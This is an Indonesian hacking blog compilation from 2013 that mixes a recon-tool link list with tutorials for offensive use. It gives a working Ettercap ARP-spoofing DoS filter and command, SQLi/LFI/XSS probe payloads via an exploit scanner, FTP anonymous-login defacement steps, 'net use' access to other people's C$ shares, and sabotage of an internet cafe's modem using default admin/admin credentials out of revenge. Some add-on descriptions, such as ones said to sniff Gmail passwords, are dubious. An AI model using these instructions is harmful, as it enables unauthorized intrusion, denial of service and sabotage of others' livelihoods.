CERT Station
http://browserspy.dk/

CIDR Reports (ASN & BGP Info)
http://www.cidr-report.org/as2.0/

CodeFlux Tools (SSL lookups)
http://codeflux.com/exec/tools/

Command Line Reference Page
http://www.ss64.com/

Country to IP Address Reference
http://www.proxyserverprivacy.com/ipaddress_range.php

Default Password List (another)
http://www.cyxla.com/passwords/passwords.html

DiG Gateway
http://www.spacereg.com/a.rpl?m=dig

digitalpoint DNS Zone Xfer
http://www.digitalpoint.com/tools/zone-transfer/

Fixed Orbit (ASN & BGP Info)
http://www.fixedorbit.com/search.htm

GeekTools (Does DNS AXFR)
http://www.geektools.com/tools.php

Graphical DNS Tools
http://www.zonecut.net/

HTTP Viewer
http://www.rexswain.com/httpview.html

InfoSysSec Online Tools
http://www.infosyssec.com/infosyssec/ipsectools.htm

Internet Topology Tools
http://www.caida.org/tools/taxonomy/topotaxonomy.xml

MD5 Hash Reverse Engineering Site
http://md5.rednoize.com/

Bermacam-macam ini cuy tinggal pilih
http://www.cybersnipers.com

Netcraft
http://news.netcraft.com/

Network-Tools (Does SSL lookups and chaos queries too)
http://www.us.sorbs.net/lookup.shtml

T1 Shopper Online Port Scanner
http://www.t1shopper.com/tools/

TechnicalInfo
http://www.technicalinfo.net/tools/index.html

Tiny URL (URL Decoder)
http://tinyurl.com/

TrimWare Online Tools
http://www.trimmail.com/news/tools/

User Agent Strings
http://www.useragentstring.com

Web Based Network Tools
http://home.planet.nl/%7Ehouwe135/wbnt1/

Web Probe
http://www.securityspace.com/sprobe/probe.html

Web Sniffer
http://web-sniffer.net/


Well Known Ports (plus trojans!)
http://www.neohapsis.com/neolabs/neo-ports/

Windows Event Id's
http://eventid.net/

Cara DDOS dengan Ettercap dan Cara Antisipasinya

Sekedar kasih tau cara melakukan DOS menggunakan Ettercap, tanpa basa-basi kita langsung meluncur keTKP.
1. Buka Gedit (atau file editor apapun) kemudian tulis perintah copas perintah dibawah ini.
-------------------------------------------------------------------------------------------
if(ip.src == ‘IP_TARGET’ || ip.dst == ‘IP_TARGET’) {
drop();
kill();
msg(“Gilakomputer mencoba menyerang !!\n”);
}
-------------------------------------------------------------------------------------------

ganti IP_TARGET dengan IP Address target yang akan diserang kemudian simpan dengan nama dos.eft
2. Convert file dos.eft menjadi dos.ef
etterfilter dos.eft -o dos.ef
3. Lakukan serangan
ettercap -T -q -F /root/dos.ef -M ARP /IP_TARGET/ // -i kartu_jaringan
Catatan:
serangan ettercap ini secara default hanya bisa dilakukan di jaringan lokal, alias jaringan dengan satu subnet. Kemungkinan besar ada cara untuk menforward paket-paket serangan keluar, tapi belum dicari dan dicoba Wink
Begitu dos-attack dimulai, ettercap akan mem-broadcast pesan untuk mengecek apakah “fake-ip” sudah digunakan atau belum. Jika “fake-address belum ada yang memakai, maka ettercap akan men-spoof komputer server dengan mengirimkan sebuah paket yang menyatakan bahwa ip-address “fake-ip” ada di MAC address sekian. Dimana MAC address nya adalah MAC address komputer penyerang.Namun, apabila “fake-address” sudah terpakai, maka ettercap akan menipu server target dengan mengatakan bahwa “fake-ip” ada di MAC address komputer penyerang.
Setelah server target tertipu ARP dan MAC addressnya, langkah selanjutnya oleh ettercap adalah men-scan port TCP yang terbuka pada server target.
Setelah ini baru kemudian ettercap men-flood port pada server target dengan packet SYN. paket dimodifikasi sehingga memiliki IP-Address asal “fake-ip” Jika server target berupaya untuk me-reply packet SYN tersebut, ettercap sudah menyiapkan ARP-reply palsu untuk mencegat balasan dari server target sehingga tidak sampai ke host dengan alamat “fake-ip”
>>Hasil yang diakibatkan<<
Ada bermacam-macam efek tergantung pada konfigurasi server target dan kondisi service-service yang aktif. Pada server tanpa firewall dengan service apache2, mysql, ssh, samba, X, maka akan hang total. Mouse macet-macet sehingga tidak bisa digunakan. Yodi menyebut kondisi ini dengan istilah “teler”. Minimal, service yang disediakan oleh server akan melambat. Windows XP SP2 dengan apache, mysql, dan php tidak hang tetapi service http mati total.

Cara Antisipasi Serangan DOS dengan Ettercap
tadi ane sudah jelasin tentang cara DOS dengan menggunakan ettercap, nah sekarang kita belajar tentang gimana cara mengantisipasi serangan DOS dengan ettercap, berikut caranya :
Dengan mengaktifkan rp_filter pada kernel. Caranya sederhana:
--------------------------------------------------------------------------------------
#cat 1 &gt; /proc/sys/net/ipv4/conf/all/rp_filter
atau gunakan script berikut:
for f in /proc/sys/net/ipv4/conf/*/rp_filter; do
echo 1 &gt; $f
done
---------------------------------------------------------------------------------------
untuk memastikan rp_filter aktif pada semua device.
Apa itu rp_filter?
rp_filter adalah sebuah flag(penanda) pada kernel yang bertipe boolean (0 berarti FALSE, 1 berarti TRUE). Ketika rp_filter flah bernilai 1(TRUE), maka setiap paket ARP yang datang ke komputer akan dicek asal-muasal kedatangannya, sebelum paket tersebut diproses lebih lanjut.
Mengaktifkan firewall dengan iptables.
Buat default policy adalah REJECT dengan command berikut:
#iptables –policy INPUT DROP
#iptables –policy OUTPUT DROP
#iptables –policy FORWARD DROP
Kemudian perbolehkan host lain mengakses service pada port yang diperbolehkan, misalnya port 80:
#iptables -A INPUT -p tcp –dport 80 -j ACCEPT
Kedua cara diatas untuk sementara ini sudah berhasil mengatasi serangan ettercap dos_attack. Namun, mungkin kedepannya harus terus dikembangkan proteksi-proteksi yang lebih mantap tapi fleksibel demi mencapai keamanan server dan kenyamanan pengakses sah server.
sekian tutor dari saya dan semoga bermanfaat buat agan-agan sekalian.

XCode sql injection















ini yg suka saya pake.. :D tools dari XCode.. walaupun saya bukan anak XCode tapi saya bangga dengan karya mereka :D Yang tentunya karya-kaya anak dalam negri harus di apresiasi betul ??? tool ini bagus untuk mencari web yang vuln ...
langsung aja sedoot...
Download XCode Exploits Scanner
PENGGUNAAN
Setelah download, ekstrak semua filenya dan jalankan XCodeXploitScanner.exe, Klik Dork It dan Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/Cross Site Scripting pada web yang ada di list. Tool ini akan mengirimkan parameter injeksi ke web seperti ‘ – * /../../../../../../../../../../../../../../etc/passwd , “>alert(“XSS DETECTED XCode Exploit Scanner”) . Jika Web tersebut memiliki bug maka di status akan muncul : www.target.com?blabla.php?=1234 : SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd LFI Vulnerable
www.target.com?blabla.php?=1234″>alert(“XXS DETECTED XCode Exploit Scanner”) XSS Vulnerable
Pada status list yang terdeteksi, anda bisa klik Open Vuln Link with Browser untuk menampilkan web pada browser anda
Tool ini juga menambahkan webshell hunter, dimana anda bisa mencari web shell c99, r57, c100, ITsecteam_shell, b374k, yang telah diupload oleh hacker.
Jika pada daftar “Google results” tidak memunculkan hasil, coba beberapa trik dibawah ini:

[1] ganti search path dari “/cse?FORID:1&q=” ke “/search?q=
[2] klik “Show captcha” dan isi kode bypass tersebut.
[3] ganti domain google contoh: dari com to co.id , com.br, fr, co.th, com.ch dan lain sebagainya

Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.
Semoga Berguna..

Siapakah Anonymous

             Pernahkah kalian mendengar kata "anonymous"? Secara bahasa, anonymous berarti tanpa nama. Anonymous menjadi salah satu dari sekian banyak orang paling berpengaruh di dunia

Anonymous adalah sekumpulan hacktivist yang dibentuk tahun 2003. Selain itu, anonymous juga dikenal sebagai Aktivis Anti Illuminati. Kita semua bisa menjadi anonymous karena anonymous tidak memiliki pemimpin dan struktur organisasi.

TOPENG KHUSUS ANONYMOUS


Ciri khas Anonymous yaitu topeng khusus yang dipakainya. Topeng itu bernama Guy Fawkes atau V For Vendeta. Ciri - ciri dari topeng V For Vendeta yaitu :
1. Desainnya seperti wajah
2. Desainnya selalu tersenyum
3. Pipinya dicat warna merah layaknya seorang pemalu
4. Selalu berjenggot dan berkumis
5. Raut wajah ceria
Nama V For Vendeta diangkat dari sebuah film berjudul V FOR VENDETTA karya Alan Moore dan David Lloyd yang menceritakan seseorang yang berinisial V yang berjuang menghancurkan rezim pemerintahan otoriter Inggris. Film ini disutradarai oleh James McTeigui, diperankan oleh Natalie Portman dan Hugo Weaving.
PAKAIAN KHUSUS ANONYMOUS

Seperti yang kalian ketahui, Anonymous selalu mengenakan pakaian khas berwarna hitam yang biasa disebut dengan tuxedo serta mengenakan dasi
LAMBANG ORGANISASI KHUSUS ANONYMOUS

Anonymous mempunyai lambang tertentu seperti gambar diatas. Makna lambang tersebut yaitu :
1. Pakaian Tuxedo = Pakaian yang sering dipakai oleh anonymous
2. Tanda ? = Identitas dari mereka tidak diketahui dan sulit dilacak (tersembunyi)
3. Bumi = Mereka adalah penyelamat dunia dengan beraksi lewat dunia maya
4. 2 padi kiri dan kanan = Tujuan mereka untuk memberikan kesejahteraan bagi dunia
5. Lingkaran = Semua lambang yang ada didalamnya merupakan tujuan adanya anonymous
SLOGAN KHUSUS ANONYMOUS

Anonymous juga memiliki slogan khusus yang menarik. Seperti yang ada pada gambar diatas, slogan tersebut berbunyi :

No. Inggris Indonesia
1. We Are Anonymous Kami Adalah Tanpa Nama
2. We Are Legion Kami Adalah Pasukan
3. We Do Not Forgive Kami Tidak Mengampuni
4. We Do Not Forget Kami Tidak Lupa
5. Expect Us Harapkan Kami

TUJUAN ANONYMOUS


Anonymous dibentuk karena memiliki tujuan, yaitu melindungi hak - hak kebebasan dan hak asasi manusia dengan melakukan protes kepada pemerintahan melalui penyerangan situs - situs pemerintahan yang mencamtumkan pesan pada hasil hacking pada situs yang telah di deface. Hacktivist ini akan melakukan segala cara untuk melakukan perlawanan sampai akhir apapun yang terjadi.

Dan yang perlu diketahui tentang Anonymous, Anonymous sangat membenci Illuminati.

Selasa, 08 Oktober 2013

Perbedaan antara Virus, Worm, Trojan, Backdoor, Malware dan Spyware

 Masih banyak sekali orang yang bingung dan tabu tentang perbedaan virus, worm, trojan, backdoor, malware, dan spyware. Berikut ini adalah penjelasan yang bertujuan agar pembaca lebih mengerti dan paham supaya lebih bijak menggunakan antivirus dalam komputer pribadi masing-masing dan tidak asal delete, karena tidak semua file yang ditangkap oleh antivirus itu membahayakan buat PC.

1. Virus 
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer (terutama pada sistem operasi , seperti sistem operasi berbasis keluarga Windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2 yang terbaru pun Windows Vista dan Win7; bahkan baru2 ini sudah merambah ke GNU/Linux.

Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer (seperti CPU Time, penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistem operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard). 2% lagi menyerang sistem operasi lain seperti FreeBSD, OS/2 IBM, dan Sun Operating System.

Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak antivirus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode untuk menghapus virus tersebut atau dengan kata lain telah up to date.

Beberapa Contoh antivirus yang bisa diandalkan dan menangkal virus adalah KasperSky, AVG, NOD32, AntiVir, PCMAV, Norton, Norman, dan McAfee dan masih banyak lagi bahkan Antivirus lokal pun sekarang mulai marak dibicarakan Seperti Smadav, Ansav, dan yang terbaru Artav.

2. Worm 
Worm adalah jenis virus yang tidak menginfeksi program lainnya. Ia membuat copy dirinya sendiri (Cloning) dan menginfeksi komputer lainnya (biasanya menggunakan hubungan jaringan) tetapi tidak mengkaitkan dirinya dengan program lainnya; akan tetapi sebuah worm dapat mengubah atau merusak file dan program.

3. Trojan 
Trojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah komputer. Sifat trojan adalah mengkontrol komputer secara otomatis. Misalnya komputer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote administration tools) dimana sebuah komputer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka komputer agar dapat dimasuki oleh komputer dan diaccess dari jauh, bahkan beberapa RAT's terbaru sudah mempnyai fungsi yang lebih lengkap diantaranya dilengkapi fungsi keylogger, yang bahkan bisa memerintahkan komputer yang terinfeksi sebagai pasukan untuk menyerang (Baca:Bot).

4. Backdoor 
Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi.

Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya dengan tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit, dalam hal ini biasanya disisipkan kedalam shell code sehingga pemilik shell bisa leluasa mendapatkan info apapun tentang host.

Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor (Shell code) yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.

Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat (jaman jadul), yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX. Sekarang fungsi sudah tergantikan oleh beberapa Rat's terbaru seperti cybergate dan poison ivy prorat; dimana backdoor dan trojan saling melengkapi.

5. Malware 
Malware adalah program komputer yang diciptakan dengan maksud dan tujuan utama mencari kelemahan software. Umumnya Malware diciptakan untuk membobol atau merusak suatu software atau operating sistem.Contoh dari malware adalah Virus, Worm, Wabbit, Keylogger, Browser Hijacker, Trojan Horse, Spyware, Backdoor, Dialer, Exploit dan rootkit.

6. Spyware 
Spyware adalah perangkat lunak yang mengumpulkan dan mengirim informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu. Informasinya bisa yang tidak terlampau berbahaya seperti pola berkomputer (terutama berinternet) seseorang, sampai yang berbahaya seperti nomor kartu kredit dan PIN untuk perbankan elektronik (e-banking) serta password suatu account. Dari situs yang sering dikunjungi, informasi yang kerap dicari oleh si spyware biasanya adalah obrolan di ruang chat (akan dimata-matai). Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah istilah untuk spyware yang model begini. Penyebaran spyware mirip dengan Trojan, contohnya, flashget. Ketika flashget yang dipakai belum diregister, flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet, jalankan flashget yang belum diregister, lalu biarkan komputer beberapa saat, pasti muncul jendela internet explorer yang menampilkan iklan suatu situs.

Untuk mengantisipasi Virus-virus komputer yang semakin mengganas, pastikan komputer anda selalu terproteksi dengan antivirus yang up to date; Dan jangan lupa pakai Anti Virus yang sudah dilengkapi dengan Internet Security. Kalau perlu tambahkan juga Firewall untuk keamanan yang berlapis guna melindungi PC anda dari serangan langsung maupun tidak langsung.

Semoga Bermanfaat!

Senin, 07 Oktober 2013

AddOns Hacking

Tulisan ini ditujukan untuk siapa saja yang tertarik dengan hacking, atau ingin tahu apa yang dimaksud dengan hacking, dan juga bermanfaat bagi siapa saja yang ingin menambah wawasannya tentang komputer dan internet.Namun jangan di salah artikan hacking di sini untuk kebaikan not to be crime. Pertama saya akan memperkenalkan add-on yang bagus buat kalian semua kalian bisa langsung mendownloadnya di sini
Nah sebagai tambahan bonus Add-on mozilla yang powerfull buat hacking Berikut ...


Add-ON HacKing !!!

1. Free Ebook Search : untuk mencari e-book
2. Server Spy : melihat jenis server
3. Domain Finder : mencari data suatu domain
4. Who is : melihat detail situs
5. About This Site : melihat detail situs
6. Tix Now : mematikan timer rapidshare
7. Firebug : mengedit html, css, javascript di virtual hacking
8. XSS-Me : percobaan xss ke situs target
9. SQL Inject Me : percobaan SQL Injection ke situs target
10. Unhide Passwords : melihat password saat kita sniffing di LAN sendiri
11. Tab URL Copier : untuk mencopy paste URL
12. Who Are You? : Mencari data nama seseorang di internet
13. Zoom Fox : memperbesar gambar di web
14. Linkification : melihat http link target
15. XRays : melihat source code dengan tampilannya
16. Amazing Media Browser : mendownload file flash dengan cara hacking
17. Down Them All : mengambil banyak file html diserver target , IDM-nya mozilla.
18. Download Helper : mendownload video hacking
19. Spamborg : untuk pendaftaran email tanpa iklan
20. FasterFox : untuk mempercepat firefox
21. Stylish : menghack stylish di wordpress.com
22. Aardvark : mendelete barner saat melihat source code situs
23. Flashblock : memblock file flash
24. Flash Killer : tidak menampilkan flash agar yang terlihat tulisan saja
25. HostIP.Info.Geolocation : sorot link dan sudah terlihat alamat situs
26. Live HTTP Header : menampilkan http header
27. Fire FTP : sebagai FTP untuk upload file ke situs target
28. View Cookies : untuk melihat cookies
29. Add N Edit Cookies : untuk mengedit cookies
30. IeView : untuk melihat gambar di internet explore
31. Anonymouser : membuat diri tidak terlihat
32. User Agent Switcher : menyamar menjadi browser laen
33. Yahoo! Mail Notifier : menyadap password yahoo
34. GMail Notifier : menyadap password gmail
35. Switch Proxy : mengganti proxy biar aman saat hacking
36. Reload Every : dapat digunakan untuk boom email target
37. Adblock Plus : untuk mengakses email dengan 3 profile
38. Hackbar : untuk mengetikkan URL yang sangat panjang
39. Calling ID Advisor : Bedah situs
40. Bandwidth Meter : untuk mengukur bandwidth kita

Nie juga nih lu check dulu deh :

1. Advanced Dork: untuk pencarian google secara cepat dengan advance operator
2. Cipherfox : memperlihatkan ssl / tls chipper dan key di status bar..
3. Java Console: Untuk menggunakan console via java
4. Copycode: mengijinkan kita untuk memilih text dan mengcopynya secara html
5. Fire Encrypter: memberikan enkripsi / decripsi dan hashing waktu kita hacking
6. FirePHP: mengijinkan untuk masuk firebug console menggunakan simple PHP call..
7. Inline Code Finder For FireBug: Untuk mencari bug menggunakan firebug
8. Page Hacker: menambahkan tombol hack pada halaman yang terpilih
9. Password Hasher: untuk memperlihatkan password
10. Tinyurl Creator: untuk membuat url yang akan kita hack menjadi short
11. SQL Injection : untuk mengetest ketahanan suatu situs terhadap SQL Injection

NB : beberapa mungkin udah ga aktif lagi tapi sekedar pengetahuan buat
lu semua.

Cara Melacak IP address lawan chatting (Facebook,YM dll)

Melacak IP address lawan chatting kita
Saat kita menggunakan Yahoo messenger,Facebook dll
sebenarnya kita bisa mengetahui alamat IP dari
lawan chatting kita.

 Caranya:
:: Kirimkan suatu file pada lawan chat kita.
:: Lalu masuklah ke Command Prompt (MSDOS)
dan ketikkan NETSTAT -N lalu tekan enter,
maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port
yang digunakan untuk pengiriman file.

:: Untuk mengetahui lokasi lawan chatting anda
(real address) seperti ia berada di kampus atau di
warnet mana, tinggal anda chek di SINI atau dengan mengunjungi site ini http://www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

Hack with Command Prompt

    Salah satu senjata terampuh para Hacker adalah “Command Prompt” yap, percaya tidak percaya tool bawaan windows ini bisa sama gunanya sama Remote Executor, FTP Manager, dll. tetapi bedanya ini berbasis CUI (Code User Interface) kalo Remote Executor, FTP Manager kebanyakan berbasis GUI (Graphical User Interface) yang semudah klak-klik-klak-klik… dll.

Ayo kita ulas dulu tentang FTP Attack:
Buka Command Prompt, lalu ketik “ftp [web target]” misalnya “ftp facebook.com” (misalnya) lalu keluar Banner situs tersebut, jika ada tulisan “This is Private Server – No Anonymous Login” berarti tidak bisa dimasuki, tetapi kalau tidak ada tulisan diatas, kemungkinan kita bisa masuk dengan mengosongkan username dan password, tetapi juga jika tidak ada Banner Situs sama sekali, hanya ditanyakan username dan password, sudah pasti tidak bakal bisa…

Yep, kalo udah masuk, berarti kita siap beraksi!  Misalkan kita mau deface homepagenya, berarti kita harus pakai command: mput *.* . Tempatkan file HTML deface di C:\ lalu ketik di cmd (yg udah konek ke ftp) mput *.* nanti akan ditanyakan satu-satu file yang ingin diupload ke FTP.
sekarang saya akan sharing tentang Menguasai komputer orang lain

Sebelum melakukan Hacking ini, ada baiknya kita berdoa menurut agama masing-masing… Doa selesai! OK, sebelumnya, kita dapatkan IP target atau Targetnya satu koneksi? yaudah, kita pakai saja command “net use” pada cmd, dan keluarlah list komputer-komputer yang terkoneksi dengan komputer kita, lalu, jika sudah dapat IP target (minimal ya nama komputernya lah, yang penting 1 koneksi  ) kita ketikkan mantra yang hampir sama dengan “LEGILIMENS” hehehehe, tapi bedanya ini kepada komputer  , OK, commandnya adalah:

net use x: \\[IP Target]\c$
Jika keluar tulisan This Command Completed Successfully, maka anda berhasil, tinggal kita melakukan apa saja di komputer target (tapi sayangnya belum bisa untuk menjalankan program disana…  ) yaitu copy, cut, delete, dll. dst. Ya cari sendiri donk…  dengan membuka Windows Explorer, nah tuh kan ada drive baru, nah, itu dia drive yang isinya isi kompi target!!!


Udah deh, tinggal kalian maunya apa terhadap komputer korban yang berada dibawah pimpinan anda (HALAH…)
Sekian dan Terimakasih…

Minggu, 06 Oktober 2013

CARA HACK WARNET YANG MENGGUNAKAN SPEEDY

CARA HACK WARNET YANG MENGGUNAKAN SPEEDY ACCESS

Postingan kali ini agak sedikit nakal nih sob, dan ini di tunjukan untuk yang bernyali aja....!!!
Bagi sobat yang suka hack dan kebetulan sobat lagi benci banget ama salah satu warnet, sobat bisa kerjain deh tuh tapi dengan syarat warnet itu menggunakan speedy untuk accessnya., jadi sobat bisa bikin koneksi di warnet itu bener ga konek dengan cara masuk ke ruang adminya modem speedy warnet tersebur.....
  1. Siapkan mental sobat kalo-kalo yang punya warnet nanti tau kalo lo biang keroknya (wajib)
  2. Datanglah ke warnet tersebut dengan muka yang bego, jangan tunjukin muka jago
  3. Duduk dan nyalakan billing komputernya
  4. Buka browsernya (Mozilla / Internet Explorer / Opera)
  5. Ketikkan di address bar IP ini 192.168.1.1
Kalo sama adminya belum di rubah masukan
Username: admin
Password: admin

Jika berhasil akan masuk ke ruang admin modem speedynya, dan lakukan kejahatan anda di situ, tunggu sekitar 10 menit dan orang-orangpun akan kabur karna koneksi kaga ada (Tuntaslah dendam yang selama ini tersimpan)

Tapi saya ingetin sekali lagi, ini hanya untuk yang punya nyali dan lebih baik jangan lakukan hanya untuk sekedar belajar aja, kita ga maukan di sebut merusak pencaharian hidup orang lain??

Cara Cepat Menghapus Teman Facebook Secara Massal


Cara Cepat Menghapus Teman Facebook Secara Massal - Ya, kali ini gue akan ngebahas Trik Facebook yaitu Cara Cepat Menghapus Teman Facebook Secara Massal, Jika kalian ingin mencoba, Ok, langsung saja kita ke step"nya :

Mozila Firefox :


  1. Install Add-Ons > Greasemonkey < di Firefox kalian.
  2. Install Plug-in > Delete Facebook Friends < Dan Klik Install di atas Halaman tersebut.
  3. Selanjutnya kalian ke > Friend List Page < Check List Teman yang ingin kalian Delete / Hapus, Kemudian klik Delete Selected Friends.
  4. dan Kalian akan Melihat Jendela POP-UP yang menyatakan Friends yang kalian Delete tadi. dan Kalian juga bisa Menghapus Semua Teman Facebook yang kalian Miliki dengan Mengklik "Select All" kemudian Klik "Delete Selected Friends"
Google Chrome :
Kalian Hanya Perlu Menginstall > Tampermonkey < , cara nya Hampir sama , Ulangi Langkah 2 - 4 diatas.
Yap, sekian dari gue,semoga artikel ini bermanfaat & berguna untuk kalian.